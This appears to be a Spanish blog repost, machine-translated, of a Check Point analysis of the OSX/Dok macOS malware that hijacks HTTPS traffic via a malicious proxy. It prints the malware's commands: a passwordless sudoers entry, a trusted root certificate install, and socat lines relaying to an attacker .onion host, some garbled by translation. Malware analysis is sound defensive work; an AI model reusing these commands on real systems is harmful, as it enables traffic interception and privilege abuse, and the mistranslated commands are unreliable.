Nuevo malware para macOS quiere leer tu tráfico HTTPS

Resultado de imagen para malware OSX / Dok

 

Las personas a menudo asumen que si se está ejecutando OSX, que está relativamente a salvo de malware. Pero esto es cada vez menos cierto, como se evidencia por un nuevo tipo de malware encontrado por el equipo de investigación de malware de Check Point. Este nuevo malware – conocido como OSX / Dok – afecta a todas las versiones de OS X, tiene 0 detecciones en VirusTotal (a partir de la escritura de estas palabras), está firmado con un certificado de desarrollador válida (autenticado por Apple), y es el primer software malicioso gran escala para dirigirse a usuarios de OSX a través de una campaña de phishing de correo electrónico coordinada.

Una vez que la infección OSX / Dok se ha completado, los atacantes obtener acceso completo a todas las comunicaciones víctima, incluyendo la comunicación cifrada mediante SSL. Esto se hace mediante la redirección de tráfico de la víctima a través de un servidor proxy malicioso.

El software malicioso se dirige sobre todo a los usuarios europeos. Por ejemplo, se observó un mensaje de phishing para dirigirse a un usuario en Alemania para molestar al usuario con un mensaje sobre supuestas inconsistencias en sus declaraciones de impuestos (véase la imagen, y la traducción, más adelante).

Detalles técnicos:

El paquete de software malicioso está contenida en un archivo .zip llamado Dokument.zip. Fue firmado 21o de abril 2017 un “Siete Muller” y el nombre del paquete es Truesteer.AppStore .

Tras la ejecución, el programa malicioso se copia en el directorio / / carpeta / Users compartida, y luego proceder a ejecutarse desde la nueva ubicación mediante la ejecución de los comandos de la shell a continuación:

A continuación, el malware pop-up fabricado un mensaje afirmando que “el paquete está dañado” y por lo tanto no puede ejecutar:

 

Si existe un loginItem llamado “AppStore”, el malware se borrará, y en lugar de sumarse como loginItem, que persistirá en el sistema y ejecutar automáticamente cada vez que se reinicia el sistema, hasta que termine de instalar su carga útil.

 

La aplicación maliciosa creará entonces una ventana en la parte superior de todas las demás ventanas. Esta nueva ventana contiene un mensaje, alegando un problema de seguridad ha sido identificado en el sistema operativo que hay una actualización disponible, y que para proceder a la actualización, el usuario tiene que introducir una contraseña, como se muestra en la imagen siguiente. El malware comprueba la localización del sistema, y ​​es compatible con los mensajes en Alemán y en Inglés.

 

La víctima está impedido de acceder a cualquier ventana o el uso de su máquina de ninguna manera hasta que se aplacan, introduzca la contraseña y permitir que el software malicioso para finalizar la instalación. Una vez que lo hacen, los privilegios de administrador ganancias de malware en la máquina de la víctima.

El uso de esos privilegios, el malware instalará a continuación  brew (cerveza) , un gestor de paquetes para OS X, que será utilizado para instalar herramientas adicionales – TOR y SOCAT

Tor, este último es una utilidad de línea de comandos de bajo nivel que permite la conexión a la web oscura.

El malware se dará entonces los actuales privilegios de administrador de usuario de inmediato sobre la demanda sin solicitar una contraseña. Esto se hace para que el malware no provocará constante contraseña de administrador cuando se le pide abusar de sus privilegios de administrador con el comando sudo. Esto se hace añadiendo la siguiente línea a / etc / sudoers:

% USER_NAME_HERE% ALL = (ALL) NOPASSWD: ALL

El software malicioso cambia la configuración de red del sistema víctima de tal manera que todas las conexiones salientes pasarán a través de un proxy, que se obtiene de forma dinámica a partir de un archivo de configuración automática de proxy (PAC) que se sienta en un servidor malicioso. El script que hace que este cambio de configuración puede verse a continuación:

A continuación, el cambio resultante puede verse en la configuración de red:

 

El malware se procederá a instalar un nuevo certificado raíz en el sistema víctima, lo que permite al atacante para interceptar el tráfico de la víctima utilizando un hombre en el medio de ataque (MiTM). Al abusar recién descubierta confianza de la víctima en el presente certificado falso, el atacante puede suplantar a cualquier sitio web, y la víctima será sin enterarse. El nuevo certificado se instala mediante el siguiente comando:

security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/cert.der

El certificado recién instalado se puede ver en las dos imágenes a continuación.

 

 

El malware también instalará 2 LaunchAgents que comenzarán con el inicio del sistema, y ​​tienen los siguientes nombres:

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.proxy.plist

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.pac.plist

 

Estos LaunchAgents volverán a dirigir peticiones a 127.0.0.1 a través de la dirección web oscura “ paoyu7gub72lykuk.onion ”. Esto es necesario para la configuración anterior PAC para trabajar (tenga en cuenta que la configuración original busca el archivo PAC en el localhost 127.0.0.1).

Estos LaunchAgents constan de los siguientes comandos BASH:

/ Usr / local / bin / socat tcp4-LISTEN: 5555, REUSEADDR, tenedor, keepalive, se unen = 127.0.0.1 SOCKS4A: 127.0.0.1: paoyu7gub72lykuk.onion: 80, socksport = 9050

/ Usr / local / bin / socat tcp4-LISTEN: 5588, REUSEADDR, tenedor, keepalive, se unen = 127.0.0.1 SOCKS4A: 127.0.0.1: paoyu7gub72lykuk.onion: 5588, socksport = 9050

 

Como resultado de todas las acciones anteriores, cuando se trata de navegar por la web, el navegador web del usuario en primer lugar pedir a la página Web atacante en términos de referencia para la configuración del proxy. El tráfico de usuario es redirigido a continuación, a través de un proxy controlado por el atacante, que lleva a cabo un ataque man-in-the-Middle y se hace pasar por los diferentes sitios de los intentos de usuario para hacer surf. El atacante es libre de leer el tráfico de la víctima y manipular de cualquier manera que quieran.

Cuando haya terminado, el malware se borra a sí mismo.

Todo queda por decir: cuidado con los regalos que llevan troyanos, especialmente si piden la contraseña de root.

 

IOC

Muestra de hash – 7819ae7d72fa045baa77e9c8e063a69df439146b27f9c3bb10aef52dcc77c145

4131d4737fe8dfe66d407bfd0a0df18a4a77b89347471cc012da8efc93c661a5

 

LaunchAgent:

/Users/training/Library/LaunchAgents/com.apple.Safari.proxy.plist

/Users/training/Library/LaunchAgents/com.apple.Safari.proxy.pac

 

 

Fuente: checkpoint

 

Anuncios


Categorías:Seguridad Informática y de la Información

Etiquetas:, , , ,

Responder

Por favor, inicia sesión con uno de estos métodos para publicar tu comentario:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: